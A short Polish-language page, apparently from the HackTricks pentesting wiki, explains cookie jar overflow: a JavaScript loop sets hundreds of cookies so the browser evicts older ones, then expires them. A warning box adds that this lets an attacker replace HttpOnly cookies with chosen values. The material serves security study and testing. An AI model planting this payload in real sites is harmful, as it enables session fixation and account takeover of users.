{{#include ../../banners/hacktricks-training.md}}

Przeglądarki mają **limit liczby ciasteczek**, które mogą przechowywać dla danej strony. Jeśli z jakiegoś powodu musisz **sprawić, aby ciasteczko zniknęło**, możesz **przepełnić słoik z ciasteczkami**, ponieważ najstarsze zostaną usunięte przed:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Zauważ, że pliki cookie stron trzecich wskazujące na inna domenę nie będą nadpisywane.

> [!OSTRZEŻENIE]
> Ta atak może być również użyty do **nadpisania plików cookie HttpOnly, ponieważ możesz je usunąć, a następnie zresetować z wartością, którą chcesz**.
>
> Sprawdź to w [**tym poście z laboratorium**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).

{{#include ../../banners/hacktricks-training.md}}